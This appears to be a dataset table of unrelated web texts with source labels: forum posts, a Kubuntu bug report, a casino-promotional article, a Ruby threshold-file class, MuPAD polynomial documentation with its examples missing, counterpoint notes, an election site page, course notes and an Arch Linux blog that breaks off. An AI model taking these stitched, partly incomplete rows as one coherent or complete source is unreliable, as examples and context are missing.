sudo ./NVIDIA-Linux-x86_64-460.91.03.run --kernel-source-path=/lib/modules/5.13.13-arch1-1/build
sudo ./NVIDIA-Linux-x86_64-460.91.03.run --kernel-source-path=/lib/modules/5.13.0-28-generic/build
- Not an easy fight at all: hours of effort, research, and planning. But as Sun Tzu said:
“If you know the enemy and know yourself, you need not fear the result of a hundred battles.”
|
OPCFW_CODE
|
/* JEBBase: generic algorithms and functions
* Copyright 2015 Jan Erik Breimo
* All rights reserved.
*
* This file is distributed under the BSD License.
* License text is included with the source distribution.
*/
#include <algorithm>
#include <cassert>
namespace JEBBase { namespace Containers {
template <typename T>
CircularArrayWrapper<T>::CircularArrayWrapper(T* data, size_t size)
: m_Data(data),
m_Size(size)
{}
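// operator[] reduces the index modulo the wrapped array's size, so any
// (arbitrarily large) index maps onto a valid element.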
template <typename T>
T& CircularArrayWrapper<T>::operator[](size_t index)
{
return m_Data[index % m_Size];
}
template <typename T>
CircularArray2D<T>::CircularArray2D()
{}
template <typename T>
CircularArray2D<T>::CircularArray2D(size_t dim0, size_t dim1)
: m_Data(dim0, dim1)
{}
template <typename T>
CircularArray2D<T>::CircularArray2D(std::pair<size_t, size_t> size)
: m_Data(size)
{}
template <typename T>
CircularArray2D<T>::CircularArray2D(const Array2D<T>& data)
: m_Data(data)
{}
template <typename T>
CircularArray2D<T>::CircularArray2D(Array2D<T>&& data)
: m_Data(std::move(data))
{}
template <typename T>
CircularArrayWrapper<T> CircularArray2D<T>::operator[](size_t i)
{
return CircularArrayWrapper<T>(m_Data[i % m_Data.rows()],
m_Data.columns());
}
template <typename T>
CircularArrayWrapper<const T> CircularArray2D<T>::operator[](size_t i) const
{
return CircularArrayWrapper<const T>(m_Data[i % m_Data.rows()],
m_Data.columns());
}
template <typename T>
size_t CircularArray2D<T>::rows() const
{
return m_Data.rows();
}
template <typename T>
size_t CircularArray2D<T>::columns() const
{
return m_Data.columns();
}
template <typename T>
std::pair<size_t, size_t> CircularArray2D<T>::size() const
{
return m_Data.size();
}
template <typename T>
void CircularArray2D<T>::setSize(size_t dim0, size_t dim1)
{
m_Data.setSize(dim0, dim1);
}
template <typename T>
void CircularArray2D<T>::setSize(std::pair<size_t, size_t> size)
{
m_Data.setSize(size);
}
template <typename T>
Array2D<T>& CircularArray2D<T>::data()
{
return m_Data;
}
template <typename T>
const Array2D<T>& CircularArray2D<T>::data() const
{
return m_Data;
}
}}
|
STACK_EDU
|
Cultivation Online – Chapter 225: I’ll Take Them All
“Follow me!”
A few minutes later, Elder Bei returned to the room with a large box.
“Pay?” Elder Bei looked at him with raised eyebrows before saying, “You don’t have to pay anything. It’s all free.”
“I see, so you’d forgotten, huh? Then let’s hope this incident will help you remember things better in the future,” Elder Bei said, and he continued after taking a deep breath, “No matter how the whole situation went down, even if I wanted to, I cannot protect you, since you chose to attack that disciple.”
“Y-You…” Elder Gu looked at Elder Bei with disbelief in his eyes and a burning sensation on his cheeks, but he didn’t dare to retaliate, since he was far weaker than Elder Bei, who was at the Spirit Master realm.
In his eyes, Yuan was only at the ninth level of the Spirit Apprentice realm. Why would he want beast cores that were far above his level?
A few moments later, Elder Bei handed Yuan’s identification badge back to him and said, “Thank you for your business.”
Yuan scratched his head and said, “Frankly, I don’t know how many I need, but I’d like the highest-level beast cores you have.”
“The highest level?” Elder Bei looked at him with wide eyes.
Once they were outside with the other sect elders, Elder Bei asked out loud, “Let me ask all of you this: what did I tell you at the beginning of this month?”
However, because the Treasury Hall had wronged Yuan, Elder Bei didn’t ask him any questions and looked through the beast core list.
“I-I had forgotten, Elder Bei…” Elder Gu quickly replied.
Yuan accepted his badge and the beast cores, tossing them into his spatial ring afterwards.
“All of them?” Elder Bei looked at Yuan with a gawking expression on his face, wondering if this was Yuan’s way of taking revenge because they’d treated him wrongly.
“How many do you need? And what level would you choose for these Spirit Warrior beast cores?”
Since he already had plenty of contribution points, it would be a waste if he didn’t use them, as he would get everything for free.
|
OPCFW_CODE
|
Understanding Artificial Intelligence: A Simple Guide for Everyone. Artificial Intelligence, often abbreviated as AI, is a concept that’s becoming increasingly prevalent in our daily lives. But what exactly is artificial intelligence, and how does it impact us? In this article, we’ll delve into the basics of AI in simple terms, exploring its definition, applications, and potential implications for society.
Table of Contents
| Sr | Headings |
|---|---|
| 1 | What is Artificial Intelligence? |
| 2 | How Does Artificial Intelligence Work? |
| 3 | Types of Artificial Intelligence |
| 4 | Applications of Artificial Intelligence |
| 5 | Pros and Cons of Artificial Intelligence |
| 6 | Ethics and Artificial Intelligence |
| 7 | The Future of Artificial Intelligence |
| 8 | Common Misconceptions about AI |
| 9 | How to Get Started with AI |
| 10 | Conclusion |
Artificial Intelligence refers to the simulation of human intelligence processes by machines, particularly computer systems. It involves the creation of algorithms and systems that can perform tasks that typically require human intelligence, such as learning, problem-solving, and decision-making. In simpler terms, AI enables machines to mimic cognitive functions like reasoning, perception, and problem-solving.
At its core, AI relies on vast amounts of data and sophisticated algorithms to make decisions or perform tasks. These algorithms process data, identify patterns, and make predictions or decisions based on that information. Machine learning, a subset of AI, allows systems to improve their performance over time by learning from experience without being explicitly programmed.
Narrow AI, also known as Weak AI, is designed to perform specific tasks or solve particular problems. Examples include virtual assistants like Siri or Alexa, which are programmed to understand and respond to voice commands within predefined parameters.
General AI, or Strong AI, is a hypothetical form of AI that exhibits human-like intelligence and cognitive abilities. Unlike narrow AI, which is focused on specific tasks, general AI would have the capacity to understand, learn, and apply knowledge across a wide range of domains.
Artificial Intelligence finds applications across various industries and sectors, revolutionizing how we work, communicate, and live. Some common applications include:
AI is used in medical imaging, drug discovery, personalized medicine, and virtual health assistants to improve patient care and outcomes.
In finance, AI is utilized for fraud detection, algorithmic trading, customer service chatbots, and personalized financial recommendations.
Autonomous vehicles rely on AI for navigation, obstacle detection, and decision-making, aiming to enhance road safety and efficiency.
Pros:
– Increased efficiency and productivity
– Automation of repetitive tasks
– Advancements in healthcare and diagnostics
Cons:
– Job displacement due to automation
– Privacy and security concerns
– Ethical implications of AI decision-making
As AI becomes more integrated into society, ethical considerations become paramount. Issues such as bias in algorithms, data privacy, and the impact of AI on employment raise important ethical questions that need to be addressed.
The future of AI holds immense potential for innovation and transformation across various sectors. Advancements in areas like deep learning, natural language processing, and robotics are expected to drive further progress in AI capabilities.
AI will replace all human jobs.
In reality, AI is more likely to augment human capabilities rather than replace them entirely.
AI is only for tech-savvy individuals.
AI applications are becoming increasingly user-friendly and accessible to people from diverse backgrounds.
Interested in exploring AI? Start by learning the basics of programming languages like Python and familiarize yourself with machine learning concepts through online courses and tutorials. Experiment with open-source AI tools and datasets to gain hands-on experience.
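For example, here is a minimal sketch using the open-source scikit-learn library (the dataset and model are just convenient defaults for a first experiment):

    from sklearn.datasets import load_iris
    from sklearn.linear_model import LogisticRegression
    from sklearn.model_selection import train_test_split

    # Load a small built-in dataset and hold out a test split.
    X, y = load_iris(return_X_y=True)
    X_train, X_test, y_train, y_test = train_test_split(X, y, random_state=0)

    # Fit a simple classifier and measure how well it generalizes.
    clf = LogisticRegression(max_iter=1000).fit(X_train, y_train)
    print("test accuracy:", clf.score(X_test, y_test))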
In conclusion, artificial intelligence represents a transformative force that’s reshaping how we live, work, and interact with technology. By understanding the fundamentals of AI and its various applications, we can better navigate its evolving role in society.
FAQs (Frequently Asked Questions)
The main branches of AI include machine learning, natural language processing, computer vision, and robotics.
While AI can simulate certain aspects of human cognition, such as problem-solving and decision-making, it does not possess consciousness or emotions like humans.
The safety of AI depends on how it’s designed and implemented. Proper ethical guidelines and regulations are essential to ensure the responsible development and use of AI technologies.
Sci-fi scenarios aside, the idea of AI taking over the world is purely speculative. AI systems are created and controlled by humans, and their actions are ultimately governed by human oversight and regulation.
AI has the potential to benefit society in numerous ways, from improving healthcare outcomes and enhancing productivity to addressing environmental challenges and advancing scientific research.
Whether you’re curious about the basics of AI or contemplating its broader implications, this guide aims to provide a comprehensive yet accessible overview of artificial intelligence for everyone. So, dive in and explore the fascinating world of AI!
|
OPCFW_CODE
|
[You can safely skip this message if you have already seen it in the
Wikidata mailing list, and pardon for the spam]
TL;DR: soweego version 1 will be released soon. In the meantime, why
don't you consider endorsing the next steps?
This is a pre-release notification for early feedback.
Does the name *soweego* ring a bell?
It is a machine learning-based pipeline that links Wikidata to large catalogs.
It is a close friend of Mix'n'match, which mainly caters for small ones.
The first version is almost done, and will start uploading results soon.
Confident links are going to feed Wikidata via a bot, while others will get into Mix'n'match for curation.
The next short-term steps are detailed in a rapid grant proposal, and I would be really grateful if you could consider an endorsement there.
The soweego team has also tried its best to address the following points:
1. plan a sync mechanism between Wikidata and large catalogs / implement
checks against external catalogs to find mismatches in Wikidata;
2. enable users to add links to new catalogs in a reasonable time.
So, here is the most valuable contribution you can give to the project right now: understand how to *import a new catalog*.
Can't wait for your reactions.
see past contributions:
as part of https://phabricator.wikimedia.org/T201165 the Analytics team
thought to reach out to everybody to make it clear that all the home
directories on the stat/notebook nodes are not backed up periodically. They
run on a software RAID configuration spanning multiple disks, of course, so we are resilient to a disk failure; but, even if unlikely, it might happen that a host could lose all its data. Please keep this in mind when working on important projects and/or handling important data that you care about.
I just added a warning to
If you have really important data that is too big to backup, keep in mind
that you can use your home directory (/user/your-username) on HDFS (that
replicates data three times across multiple nodes).
Please let us know if you have comments/suggestions/etc.. in the
Thanks in advance!
Luca (on behalf of the Analytics team)
TL;DR: In https://phabricator.wikimedia.org/T170826 the Analytics team
wants to add base firewall rules to stat100x and notebook100x hosts, that
will cause any non-localhost or known traffic to be blocked by default.
Please let us know in the task if this is a problem for you.
the Analytics team has always left the stat100x and notebook100x hosts
without a set of base firewall rules to avoid impacting any
research/test/etc.. activity on those hosts. This choice has a lot of
downsides, one of the most problematic ones is that usually environments
like the Python venvs can install potentially any package, and if the owner
does not pay attention to security upgrades then we may have a security
problem if the environment happens to bind to a network port and accept
traffic from anywhere.
One of the biggest problems was Spark: when somebody launches a shell using
Hadoop Yarn (--master yarn), a Driver component is created that needs to
bind to a random port to be able to communicate with the workers created on
the Hadoop cluster. We assumed that instructing Spark to use a predefined
range of random ports was not possible, but in
https://phabricator.wikimedia.org/T170826 we discovered that there is a way
(that seems to work fine from our tests). The other big use case that we
know, Jupyter notebooks, seems to require only localhost traffic flow
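For reference, here is a sketch of how a PySpark session might pin its ports to a predictable range. The property names are standard Spark settings, but the values are purely illustrative and may not match what the task finally adopted:

    from pyspark.sql import SparkSession

    spark = (SparkSession.builder
             .master("yarn")
             # First port the driver tries to bind; spark.port.maxRetries bounds
             # how far upward it will walk from there, giving a known range.
             .config("spark.driver.port", "12000")
             .config("spark.blockManager.port", "12100")
             .config("spark.port.maxRetries", "64")
             .getOrCreate())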
Please let us know in the task if you have a use case that requires your
environment to bind to a network port on stat100x or notebook100x and
accept traffic from other hosts. For example, having a python app that
binds to port 33000 on stat1007 and listens/accepts traffic from other stat
or notebook hosts.
If we don't hear anything, we'll start adding base firewall rules to one
host at the time during the upcoming weeks, tracking our work on the
Luca (on behalf of the Analytics team)
For those of you who are interested in "small" Wikipedias and Indigenous
languages, here's a new academic paper co-signed by yours truly.
Published in an open access journal :)
Nathalie Casemajor (Seeris)
*Openness, Inclusion and Self-Affirmation: Indigenous knowledge in Open
This paper is based on an action research project (Greenwood and Levin,
1998) conducted in 2016-2017 in partnership with the Atikamekw Nehirowisiw
Nation and Wikimedia Canada. Built into the educational curriculum of a
secondary school on the Manawan reserve, the project led to the launch of a
Wikipedia encyclopaedia in the Atikamekw Nehirowisiw language. We discuss
the results of the project by examining the challenges and opportunities
raised in the collaborative process of creating Wikimedia content in the
Atikamekw Nehirowisiw language. What are the conditions of inclusion of
Indigenous and traditional knowledge in open projects? What are the
cultural and political dimensions of empowerment in this relationship
between openness and inclusion? How do the processes of inclusion and
negotiation of openness affect Indigenous skills and worlding processes?
Drawing from media studies, indigenous studies and science and technology
studies, we adopt an ecological perspective (Star, 2010) to analyse the
complex relationships and interactions between knowledge practices,
ecosystems and infrastructures. The material presented in this paper is the
result of the group of participants’ collective reflection digested by one
Atikamekw Nehirowisiw and two settlers. Each co-writer then brings his/her
own expertise and speaks from what he or she knows and has been trained for.
Casemajor N., Gentelet K., Coocoo C. (2019), « Openness, Inclusion and
Self-Affirmation: Indigenous knowledge in Open Knowledge Projects », *Journal
of Peer Production*, no13, pp. 1-20.
More info about the Atikamekw Wikipetcia project and the involvement
of Wikimedia Canada:
I’m with a group of researchers <https://grouplens.org/> working on using
Artificial Intelligence (AI) tools to promote gender diversity in Wikipedia
contents and thus to close the gender gap
<https://en.wikipedia.org/wiki/Gender_bias_on_Wikipedia>. We want to build
a recommender system that targets the gender gap in content, while creating
personalized article recommendations for editors. To ensure that our tool
addresses real community issues, we plan to design the recommender
algorithms by incorporating the feedback from stakeholders in the
community, such as members of the WikiProject Women in Red, related
WikiProjects, and others who are concerned with this issue. We want to
understand your concerns and values as we come up with effective designs.
For more details about our project, please refer to our Wikimedia project page.
If you are interested or have any thoughts and suggestions, please feel
free to reach out to me at bowen-yu(a)umn.edu and we can plan a time to talk.
|
OPCFW_CODE
|
What is a sportsbook? A sportsbook is an establishment where you can place wagers on various sports events. These establishments accept clients from around the world and usually offer amenities such as HD televisions and parlay bets. The only difference between an online and a physical sportsbook is the way they operate. If you’re not sure what a sportsbook is, here are some of the benefits of online sportsbooks:
Online sportsbooks operate under the same principles as physical sportsbooks
While they may not be as widely available as their physical counterparts, online sportsbooks use the same principles to conduct their business. Like physical sportsbooks, online sportsbooks use software to display odds for different sporting events. Some have developed their own software, but for the most part, they pay a software company to run their business. The variety of sportsbooks available depends on the region they’re in. For example, European sportsbooks cater more to European bettors than their North American counterparts.
When depositing funds, most online sportsbooks charge the same fees as their physical counterparts. Users must enter a CVV2 code (which differs from card to card) when making a deposit. Depending on the sportsbook, they may also ask for confirmation of withdrawals before releasing money. It’s a good idea to deposit small amounts first to avoid disappointment later. Many sportsbooks also offer bonuses and promotions for customers who place bets on sports.
They accept clients from all over the world
A good sportsbook will have a variety of payment and withdrawal options. These options may include Visa, PayPal, Play+, and paper checks. Some sportsbooks may even offer cash at the casino cage. They should have a strong track record for protecting consumer information, as well as fast payouts. Signing up with a legal sportsbook is the easiest way to ensure your privacy and safety. However, be sure to read the terms and conditions of the sportsbook you choose to use before making a deposit or withdrawal.
They offer amenities like HD televisions
High-definition televisions (HDTVs) are excellent investments for healthcare facilities. HDTV prices have fallen significantly in the last few years, making them affordable for large-scale deployments. Healthcare facilities should consider the format of their content before purchasing HDTVs, because HD-formatted content delivers sharp, high-definition pictures. The right technology partner will help you focus on other opportunities. For example, choosing an HD formatted television can help improve the quality of the patient experience.
They accept parlay bets
A parlay bet is a multi-team wager made up of several smaller bets. The goal is to win all of these bets, but the whole wager loses if even one team loses. As a result, parlays are less likely to win in the long run than traditional bets, but they can be a lot of fun. It’s important to remember, though, that you can’t count on winning by placing small wagers on 10-team parlays.
The best sportsbooks will have multiple options for placing your bets. They will have a variety of wagers, such as sides, totals, futures, props, and more. You’ll also find sportsbooks that offer parlay cards. Whether these parlays are legal in your state will depend on how they operate. But, they all have some things in common. For instance, they pay out different amounts on parlays.
|
OPCFW_CODE
|
In this month’s Meet the Artist we have a talk with the talented 3D artist Daniel Zucco.
Meet Daniel Zucco
I was born and grew up in Tasmania, the beautiful island at the bottom of Australia, but moved to London 10 years ago now and I think of it as home. I always had a desire to move to Europe after my family took me on a 3-month holiday around Western Europe when I was a teenager. I was amazed by the fact that you could just jump on a plane or train and be in another country in an hour. For some perspective, the closest neighbouring country to Tasmania is a 7-hour flight.
I also loved the amount of diverse art you are exposed to when living in Europe, although MONA (Museum of Old and New Art) launched in Tasmania just after I left and is now attracting people from all over the world.
I currently live in London, which has been an incredible city to live in. It’s culturally diverse and there’s always something new to do or see. Before the pandemic, I would wander into the city every Saturday to see one of the new, free exhibitions.
I am a 3D artist, passionate about generative design. Commercially, I work as a freelance Art Director collaborating with agencies and studios around the world, designing for global brands. My personal work on the other hand, focuses on exploring and designing generative art and pattern design which both generally influence my commercial work.
I studied Electronic Media at University of Tasmania – a degree centered around creating art with technology. For my honors project I designed an interactive film made in Flash that allowed a user to select random moving particles to construct their own edit of a prerecorded film. I think it was this project that sparked my curiosity about randomness – which is now the basis of most of my work.
I tend to start most of my projects in Illustrator, working out the shapes, colours and the general rules of the piece. I often use Illustrator scripts to randomize elements of the designs. I also usually build everything on a single artboard if I’m going straight to 3D, or I’ll use multiple small artboards to design individual assets if I am going to continue developing the composition with coding software such as the Hype framework.
After settling on a design, I bring the Illustrator file into Cinema 4D using the Art Smart Plugin. I then use Mograph to further manipulate the design in 3D; randomizing the colours, position, rotation and scale of the individual elements. I sometimes animate the designs as I enjoy creating looped animations. I then work on light, texture and render the design in Octane.
I really enjoy designing the parameters to generate randomness and love building systems in 3D that enable me to quickly sort through hundreds of combinations of a single design. There is something about the process that seems to make sense of the universe; being able to create simple rules that when combined make something highly complex.
My latest personal project is called “one hundred boxes”. I have designed 100 geometric designs that can be combined onto a canvas randomly. Each piece is able to rotate 90 degrees, four times, as well as move to any one of the one hundred positions on the artboard. These two rules alone mean that the number of combinations I could make for this one piece of work would be greater than the number of atoms in the universe, which I think is pretty cool.
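As a rough back-of-the-envelope check of that claim (assuming all 100 distinct pieces are placed, each in its own position, each with one of 4 rotations):

import math

# 100! ways to assign pieces to positions, times 4 rotations per piece
combinations = math.factorial(100) * 4 ** 100   # about 1.5e218
atoms_estimate = 10 ** 80                       # common estimate for the observable universe
print(combinations > atoms_estimate)            # True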
I draw inspiration from lots of places but Instagram and Behance are my daily go-to for fresh inspiration. Some of my favorite artists who I follow on Instagram include Manoloide, Dimitri Cherniak, Anna Mac, PosterLad and Peter Tarka.
Looking ahead, I hope to continue exploring new ways of creating art and to make personal work more often.
You can find me on Instagram, Behance and Etsy.
|
OPCFW_CODE
|
You are an exceptional problem solver with great communication skills and are able to optimize our application in terms of technology and in delivering the best user experience. Your responsibilities will include translating design wireframes into the code that will produce visual elements of the application. You will have the opportunity to work with the latest tools, including [list your tech stack here]. You will play a key role in guiding our tech stack and will actively mentor your fellow developers. A front-end developer is a tech-savvy role that requires expertise in web design and involves translating customer needs into interactive web apps with visual elements that users see and interact with.
Subham creates websites that help organizations address business challenges and meet their requirements from development to project deployment. He has amazing communication skills and is professional in contributing individually and as a team. A front-end developer is responsible for designing and implementing the user interface of a website or web application.
A solid understanding of responsive design and cross-browser compatibility is essential to ensure that websites are accessible across various devices and platforms. Additionally, knowledge of version control systems like Git and experience with testing and debugging tools are valuable skills that contribute to a developer’s technical competence. Front-end developers focus on the visual layout, user interface/interaction, and user experience.
Akshay is an experienced content marketer, passionate about education and technology. With a love for travel, photography, and cricket, he brings a unique perspective to the edtech industry. Through engaging articles, he shares insights, trends, and inspires readers to embrace transformative edtech. Participate in open-source projects, which can provide valuable experience and exposure. We are committed to diversity and encourage all qualified candidates to apply. We do not discriminate based on race, color, religion, sex, national origin, age, disability, or any other status protected by law.
On a typical day, you can expect to coach engineers to level up their technical and soft skills, to plan and scope future projects, and to help fix a small bug or guide a new feature development. UI is the graphical layout of an application that determines what each part of a site or application does and how it will look. “I’ve always found crafting polished user interactions that surprise and delight users to be the most rewarding and engaging task,” says Mari Batilando, a software engineer at Meta. “In order to do this, you need to both have an eye for detail and a rock-solid understanding of the platform.” Your software product will only be as good as how your frontend developers build it. To understand the frontend developer job description, we must first learn the nature of frontend development.
Choose The Right Software Development Program
- The right candidate will be responsible for the design and development of client-facing features.
- Visit our informative Frontend Developer hiring guide for additional insight.
- These qualifications are subject to change depending on the needs of a company or a team.
- That said, we provide our clients with software developers, QA testers, and other IT professionals that match their projects.
- Johnathan has 15 years of experience writing web apps that span consumer productivity software to mission-critical financial trading platforms.
There are technologies and knowledge that are common to all web developer jobs. A front-end web developer is probably what most people think of as a “web developer”. A front-end web developer is responsible for implementing the visual and interactive elements that users see and engage with through their web browser when using a web application. They are usually supported by back-end web developers, who are responsible for server-side application logic and integration of the work front-end developers do.
Their primary goals are to raise user satisfaction, decrease user churn, and ensure user-based company goals are reached. Such goals might include increasing newsletter sign-ups, improving sales conversions, or identifying and removing pain points within an app. Nathan is a senior React engineer and an expert in streamlining UI/UX with React. As the lead design engineer at Motorola Solutions, he marshaled a product combining React, Angular, and Svelte to company-wide deployment, garnering more than 100,000 downloads. Nathan also developed Hypetrigger, a popular machine vision system for use with streaming services, which is built with React and SolidJS on the front end.
|
OPCFW_CODE
|
If you’d like to try and use Linux without damaging your hard drive or your Windows partition, then this guide is for you. It will walk you through setting up Windows Ubuntu Installer (wubi) and also show you how to remove it in case you decide Linux is not for you.
You can download Windows Ubuntu Installer at the following link:
Once downloaded, run the wubi.exe file. You should see a screen like this:
Installation drive: This option is where you want to load all the Ubuntu files. If you only have one drive, then C: is your only option. If you have multiple drives and your C drive doesn’t have enough space on it, you can install to a different drive.
Installation size: This indicates how much space will be taken up by this Linux environment. The installation itself will fill up about 3 GB, so anything over that will be used as free space for you to store applications, files, etc. Maximum storage is set to 30 GB; 15 GB is recommended for starters. If you don’t have a lot of space, choose 6 GB and that should be enough.
Desktop environment: The look and feel of different Linux desktops. By default, the desktop is called Gnome, but there are other variants such as KDE, Xfce and others. You can look these up online and see which ones you really like. A lot of people prefer KDE because of its eye candy, but my personal preference is Gnome because it’s very simple. Xfce is also very simple and lightweight. The list is as follows:
1) Ubuntu – gnome
2) Kubuntu – KDE
3) Xubuntu – Xfce
Language: English unless you prefer something different
Username and password: anything you like.
That’s all you have to do. The rest of the process is automated. The program will automatically go out and download the latest operating system (make sure you’re connected to the internet). It should complete in about 30 minutes depending on your connection speed. It will also modify your boot menu to add Ubuntu to it.
Next time you restart your computer you will see Windows and Ubuntu as boot choices. Choose Ubuntu and log in with the username and password you chose.
At this point you can begin exploring Ubuntu. You can also access your Windows files and store files from Ubuntu to those locations if you wish.
Wubi can be removed from Control panel just like any other program. This removal process will clean up your boot manager as well, so everything will go back to normal.
*Disclaimer: AVADirect and its Staff are not responsible for any damage to software/hardware, loss of data or personal injury by following our How-To guides. These guides are provided only as an aid to help you troubleshoot system problems. If you do not feel comfortable performing these steps it’s always best to send in your system to a local repair shop or contact an appropriate technical support line for additional assistance.
|
OPCFW_CODE
|
Winning wmn; 2023
Ah! This one has been pending on me for a long time. But as the cozy winters and holiday season are here, I felt like wrapping up the things I wanted to finish this year. After all, this year I was trying to push my boundaries and put myself in challenging situations, putting my ideas and learnings into blogs being one of them :p. Another such experiment was participating in a hackathon with no prep beforehand.
What was the challenge for me?
I'm mostly an introvert, and speaking up in front of even 10 people is daunting for me. Participating in a hackathon where I'd need to brainstorm ideas with unknown folks would be a bit outside my comfort zone. I had participated in hackathons during my undergrad days but had mostly worked alongside my college friends. Nonetheless, I channeled my inner coder strength to convince myself to participate and meet some tech-savvy women in the process. Yep, that was the motivation! :)
What was wmn;2023?
It was an onsite, women-only, 24-hour-long hackathon organised by Devfolio.
I was working at an insure-tech company back then and had some understanding of the problems faced by Indian insurance companies and the gaps between customer expectations and insurance limitations, while being very impressed with the insurance systems in first-world countries like Singapore. I thought of building a project on a similar idea. At the hackathon, I met a girl working in healthcare and we brainstormed our ideas for the prototype.
What did we build?
The idea was to improve the overall claims experience at the provider end, i.e. enabling insurance providers to detect and reject fraudulent claims, as well as to ensure an entirely cashless flow at the customer's end, without the manual intervention of customers preserving receipts from a consultation/treatment and uploading them later to get a reimbursement.
How was it solving the provider experience?
One of the major pain points for an insurance provider is being able to detect a fraudulent claim. Especially in OPDs with low ticket sizes, the possibility of fraud increases even more, and that is one of the reasons why insurance providers in India don't include OPD in the benefits. Another problem is that data not being shared between different providers leads to a chance of duplicate claims.
How was it solving customers' experience?
OPD coverage - Most insurance providers in India do not provide OPD coverage. However, from the customers' point of view, this is the biggest economic cost center in health. With a lower possibility of fraud, insurance providers will be able to offer more holistic coverage, including OPDs.
Cashless experience - Most insurance plans have a reimbursement flow and no coverage for OPD, which means saving all the receipts, uploading them, and waiting for weeks for approval.
Privacy of PII data - If there is a central system for storing all the health records, as a customer I should be able to control that data access. Each time an insurer requests my data, I should be able to control what document data I want to share, and only upon my authorization should that data be shared.
Adding a demo link for the project -
Video - https://www.loom.com/share/5d235242d6f14470ba1bbcb7830a8c96?sid=48fdd704-788b-4b80-82b4-d1cb63490b72
Project link - https://devfolio.co/projects/insurease-50a3
Winning the grand prize
And yeah, that was it. After a really long time, I pushed myself to stay up for ~30 hrs to finish the prototype project as a solo developer. After all, it was about pushing my boundaries. I saw the announcement on Twitter the next day. :)
|
OPCFW_CODE
|
5209R: MariaDB 5.5 vs 10.1
The MariaDB 10.1 PKG from the shop had some compatibility issues. Here is how we fixed them.
For a few months now we've been offering a MariaDB-10.1 PKG in the BlueOnyx shop which replaces the CentOS 7 provided MariaDB-5.5 with MariaDB-10.1.
However: Several clients reported that their PHP applications then started exhibiting PHP error messages like this:
Headers and client library minor version mismatch.
After some investigation the issue became clear: This totally depends on which mechanism a PHP application uses in order to connect to MySQL/MariaDB:
Some are affected, some not. It also depends on how picky the PHP application is and (naturally) also on the error reporting that's configured for your PHP. Although both MariaDB versions use the same "libmysqlclient.so.18" there is of course a minor header difference, which can only be resolved by recompiling PHP against MariaDB-10.1.
Now a recompile is highly uncomfortable as it opens a can of worms. Not only would all shop PHP packages need a rebuild. No, we would also have to replace the CentOS provided "php-mysql" RPM with a version rebuilt against MariaDB-10.1. Which (in our experience) causes a ton of grief during future OS updates.
But here is the proper solution:
PHP has long provided a replacement mechanism to allow MySQL access via PHP. Instead of compiling against the external MySQL client library, we can use the MySQL drivers that ship with PHP. These are called "MySQL-nd".
CentOS 7 comes with two RPMs that provide MySQL/MariaDB support for PHP. Only one of them can be installed and you can't have both at the same time:
- php-mysql (which we used so far)
- php-mysqlnd (which we ought to use instead)
We just published a set of YUM updates for BlueOnyx 5209R which removes php-mysql and replaces it with php-mysqlnd.
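For reference, the manual equivalent on a stock CentOS 7 box would look roughly like this (the BlueOnyx YUM updates take care of this automatically):

# swap the client-library-based driver for the native driver
yum swap php-mysql php-mysqlnd
# restart the web server so PHP picks up the new extension
systemctl restart httpd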
As MySQL-nd is less picky about which version of MariaDB is installed this will solve the irritating header warning that some PHP applications used to throw.
Please note: You do not need to change anything in your PHP applications, as this should be a seamless update without any issues.
Meanwhile we are also rebuilding the latest PHP packages for 5209R in the BlueOnyx shop to use MySQL-nd. Updated PHP PKGs will become available later today (January 26th, 2017).
|
OPCFW_CODE
|
cannot mount routable engine to my consuming app
I'm trying to mount an engine in my project as per the demo:
consuming app:
https://github.com/dgeb/ember-engines-demo
engine app:
https://github.com/dgeb/ember-blog-engine
The demo works well. But when I mount the ember-blog-engine in my own consuming app, an error occurs and the error message is "Error: Could not find module ember-blog-engine/engine imported from (require)".
How I add the engine:
package.json
"dependencies": {
"ember-engines": "0.6.3",
"ember-blog-engine": "path-to/ember-blog-engine",
...
},
router.js
this.mount('ember-blog-engine', {as: 'blog'});
I added active-session.js and blog-data.js in the services folder because those services are used by the demo engine.
app/app.js
engines: {
  emberBlogEngine: {
    dependencies: {
      services: [
        'blog-data',
        { 'session': 'active-session' }
      ]
    }
  }
}
I found that the ember-blog-engine's source code is never built into vendor.js. When executing ember build, the console shows the engine's modules are dead:
...
addon-tree-output/modules/ember-blog-engine/components/date-picker.js
addon-tree-output/modules/ember-blog-engine/config/environment.js
addon-tree-output/modules/ember-blog-engine/engine.js
addon-tree-output/modules/ember-blog-engine/initializers/hello.js
addon-tree-output/modules/ember-blog-engine/instance-initializers/hello-instance.js
addon-tree-output/modules/ember-blog-engine/routes.js
addon-tree-output/modules/ember-blog-engine/routes/application.js
addon-tree-output/modules/ember-blog-engine/routes/index.js
addon-tree-output/modules/ember-blog-engine/routes/new.js
addon-tree-output/modules/ember-blog-engine/routes/post.js
addon-tree-output/modules/ember-blog-engine/routes/post/comments.js
addon-tree-output/modules/ember-blog-engine/templates/application.js
addon-tree-output/modules/ember-blog-engine/templates/components/date-picker.js
addon-tree-output/modules/ember-blog-engine/templates/index.js
addon-tree-output/modules/ember-blog-engine/templates/new.js
addon-tree-output/modules/ember-blog-engine/templates/post.js
addon-tree-output/modules/ember-blog-engine/templates/post/comments.js
addon-tree-output/modules/ember-blog-engine/templates/post/index.js
...
dead 239
traversed 1347
You also need to add the engine to the consuming app in app/app.js so the app knows about the engine. IMO this isn't covered very well in the guides, should probably be in the "mounting an engine" section.
Thanks for your reply. But I have put it in my app.js; it was my mistake to leave this out of the issue description. I have updated the issue description.
@SuperManHa the ember-engines 0.6.x is compatible with ember-cli 2.18 or greater - https://github.com/ember-engines/ember-engines/blob/master/config/ember-try.js#L15
please update ember-cli on your consuming app and try again
thanks!
Is this still an issue?
|
GITHUB_ARCHIVE
|
From: Venkatesh Srinivas <firstname.lastname@example.org>
Subject: GSoC Segments: What have I been doing, anyway?
Date: Mon, 16 Aug 2010 10:29:54 -0400
So GSoC is more or less over!
First, I really need to thank David Eckhardt and Erik Quanstrom for putting
up with me this summer; dealing with me can be as frustrating as pulling
teeth with a screwdriver when a patient only speaks another language. Next
time I see either/both of them, I owe them beer/non-alcohol-beverage or
pizza . Also, thanks to Devon for everything, including waiting over an
hour for me downtown.
I have been working on the segment code and making forays into libthread.
Let me first talk about what exactly I did, without talking about the
In Plan 9 fresh-out-of-the-box, a process's address space is constructed
from a series of segments, contiguous ranges of address space backed by the
same object. By default, a process has a small number of segments: a Text
segment, backed by the image, a Stack segment, backed by anonymous memory, a
Data segment to back the heap structure, and a BSS segment for the usual
purpose. Each process also has a small series of slots, currently 4, for
other segments, obtained via the segattach() system call and released via
the segdetach() syscall. When a process calls rfork(RFPROC), segments from
the "shared" class are shared across the fork and "memory" class segments
are copy-on-write across the fork; each process gets its own stack. When a
